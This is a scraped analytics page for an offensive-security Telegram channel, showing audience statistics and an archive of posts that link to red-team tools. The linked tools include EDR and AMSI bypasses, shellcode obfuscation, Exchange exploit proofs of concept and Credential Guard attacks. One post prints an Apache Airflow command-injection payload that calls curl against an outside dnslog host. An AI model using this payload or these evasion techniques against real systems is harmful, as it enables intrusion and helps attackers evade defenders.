APT

Open in Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Russia45 663 Technologies & Applications8 841...

📈 Analytical overview of Telegram channel APT

Channel APT (@apt_notes) in the English language segment is an active participant. Currently, the community unites 14 653 subscribers, ranking 8 841 in the Technologies & Applications category and 45 663 in the Russia region.

📊 Audience metrics and dynamics

Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 14 653 subscribers.

According to the latest data from 11 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 406 over the last 30 days and by 16 over the last 24 hours, overall reach remains high.

Verification status: Not verified
Engagement rate (ER): The average audience engagement rate is 48.83%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
Post reach: On average, each post receives 7 154 views. Within the first day, a publication typically gains 0 views.
Reactions and interaction: The audience actively supports content: the average number of reactions per post is 18.

📝 Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
“This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

Thanks to the high frequency of updates (latest data received on 12 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

14 653

Subscribers

+1624 hours

+1087 days

+40630 days

7 154

Post views

No data24 hours

No data48 hours

48.83%

Engagement rate

No data

Posts per day

Ads index

beta

Posts Archive

14 658

⚙️ Meterpreter BOFLoader In this guide, you'll learn how the new BOFLoader extension allows BOFs to be used from a Meterpreter session. Discover new attacks made possible in Meterpreter and avoid common errors. https://www.trustedsec.com/blog/operators-guide-to-the-meterpreter-bofloader #msf #meterpreter #bof #loader

14 658

Repost from 1N73LL1G3NC3

Inline-Execute-PE Is a CobaltStrike toolkit enabling users to load and repeatedly run unmanaged Windows exe’s in Beacon memory without dropping to disk or creating a new process each time.

14 658

😈 Microsoft Exchange: OWASSRF + TabShell (CVE-2022-41076) The TabShell vulnerability its a form of Privilege Escalation which allows breaking out of the restricted Powershell Sandbox after you have successfully gained access through OWASSRF. For a detailed write see research: https://blog.viettelcybersecurity.com/tabshell-owassrf/ PoC: https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e #owa #ssrf #tabshell #poc

14 658

✨ Happy New Year! Happy holiday to you, dear friends and subscribers of my channel! This year has brought a lot of trouble and a lot of joyful moments. In the new year, I wish you more vulnerabilities found, interesting research and all the best. Thank you for all the support, feedback, and messages this year! Love you all ♥️

14 658

Repost from Offensive Xwitter

👹 [ snovvcrash, sn🥶vvcr💥sh ] Rewritten #DirtyVanity PoC injector to C# and #DInvoke. Great stuff @eliran_nissan! https://t.co/ifQLPMSFpb Happy upcoming New Year to everyone! 🎄 🔗 https://gist.github.com/snovvcrash/09deab831d49028e194e8ee83f2616a9 🐥 [ tweet ][ quote ]

14 658

🔑 Pass-the-Challenge This blog post introduces new techniques for recovering the NTLM hash from an encrypted credential protected by Windows Defender Credential Guard. While previous techniques for bypassing Credential Guard focus on attackers targeting new victims who log into a compromised server, these new techniques can also be applied to victims logged on before the server was compromised. Research: https://research.ifcr.dk/pass-the-challenge-defeating-windows-defender-credential-guard-31a892eee22 Source: https://github.com/ly4k/PassTheChallenge #ad #windows #ntlm #challenge

14 658

Happy Christmas to everyone!

14 658

🎲 PowerShell Obfuscation A simple and effective powershell obfuscaiton tool bypass Anti-Virus and AMSI-bypass + ETW-block. https://github.com/H4de5-7/powershell-obfuscation #powershell #obfuscation #amsi #etw #bypass

14 658

👾 Windows Drivers Reverse Engineering Methodology This blog post details a methodology for reverse engineering and finding vulnerable code paths in Windows drivers. Including a guide for setting up a lab for (the pesky) kernel debugging. https://voidsec.com/windows-drivers-reverse-engineering-methodology/ #reverse #driver #analysis

14 658

💥 Shellcode Mutator New tool to help red teamers avoid detection. Shellcode is a small piece of code that is typically used as the payload in an exploit, and can often be detected by its “signature”, or unique pattern. Shellcode Mutator mutates exploit source code without affecting its functionality, changing its signature and making it harder to reliably detect as malicious. Research: https://labs.nettitude.com/blog/shellcode-source-mutations/ Source: https://github.com/nettitude/ShellcodeMutator #shellcode #mutator #nasm #redteam

14 658

😈 OWASSRF — New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations CrowdStrike recently discovered a new exploit method using CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access. https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/ #owa #exchange #ssrf #proxynotshell

14 658

Repost from internet-lab.ru

🔐 MULTIFACTOR — особенности 2FA Существует неплохое решение для организации двухфакторной аутентификации в корпоративной среде под названием MULTIFACTOR. Входит в реестр российского ПО за номером 7046. Это не реклама, поскольку сегодня буквально в двух словах мы расскажем про то как этот второй фактор можно обойти в некоторых очень частных случаях. Бу-га-га. #security #special https://internet-lab.ru/multifactor_2fa_bug

14 658

💉 Dirty Vanity — A New Approach to Code injection & EDR bypass A POC for the new injection technique, abusing windows fork API to evade EDRs. Source: https://github.com/deepinstinct/Dirty-Vanity Research: https://i.blackhat.com/EU-22/Thursday-Briefings/EU-22-Nissan-DirtyVanity.pdf #av #edr #bypass #injection #fork #api

14 658

$⚔️ DirCreate2System Weaponizing to get NT AUTHORITY\SYSTEM for Privileged Directory Creation Bugs with Windows Error Reportin$

⚔️ DirCreate2System Weaponizing to get NT AUTHORITY\SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting https://github.com/binderlabs/DirCreate2System #windows #privesc #directory #error #report

14 658

⚔️ Mangle — EDR Bypass This is a tool that manipulates aspects of compiled executables (.exe or DLL). Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files. In doing so, Mangle helps loaders evade on-disk and in-memory scanners. https://github.com/optiv/Mangle #edr #bypass #inflate #certificate

14 658

🎁 HackTheBox — ProLab Discount HackTheBox is running a huge pro-lab discount this month. Use coupon code: "weloveprolabs22" and waive the setup fee ($95) of any pro lab. Each pro lab is $27/m, which makes this over 75% off. The coupon expires at the end of the year. #hackthebox #prolab #discount

14 658

Repost from Ralf Hacker Channel

Довольно интересный анализ на примере Аваста Hooking System Calls in Windows 11 22H2 like Avast Antivirus. Research, analysis and bypass https://the-deniss.github.io/posts/2022/12/08/hooking-system-calls-in-windows-11-22h2-like-avast-antivirus.html #research #redteam

14 658

Repost from In4sek stories

https://telegra.ph/StandoFF-prelude-11-20

14 658

💨 Apache Airflow RCE Tracked as CVE-2022-40127, the flaw affects Apache Airflow versions prior to 2.4.0. Apache Airflow could allow a remote attacker to execute arbitrary commands via the manually provided run_id parameter, which exists in Example Dags of Apache Airflow. By sending a specially crafted request, an attacker could exploit the CVE-2022-40127 flaw to execute arbitrary commands. PoC: 1. Active example_bash_operator at DAGs 2. Run ID parameter

{"test":"\";curl `id -u`.xxx.dnslog.cn;\""}

#apache #airflow #dags #rce

14 658

💣 ProxyNotShell PoC ProxyNotShell this is a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery vulnerability (CVE-2022-41040) and a second vulnerability that allows Remote Code Execution (CVE-2022-41082) when PowerShell is available on the Exchange Server. Research: https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend Nmap Checker: https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse PoC: https://github.com/testanull/ProxyNotShell-PoC #exchange #proxynotshell #ssrf #rce